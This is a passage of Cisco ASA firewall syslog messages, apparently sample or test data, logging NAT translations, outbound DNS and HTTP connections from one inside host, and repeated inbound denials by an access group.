12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs +Oct 10 
2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP 
connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for 
outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:192.168.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:192.168.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP 
connection 11818 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:192.168.98.44/8294 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:192.168.198.25/80 (192.168.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:192.168.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:192.168.98.44/8276 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:192.168.162.30/53 (192.168.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:192.168.3.39/53 (192.168.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:192.168.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: 
Teardown UDP connection 11822 for outside:192.168.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:192.168.48.186/53 (192.168.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:192.168.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP 
translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 
(192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to 
inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30 +Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to 
outside:192.168.98.44/8300 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30 
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst 
inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 
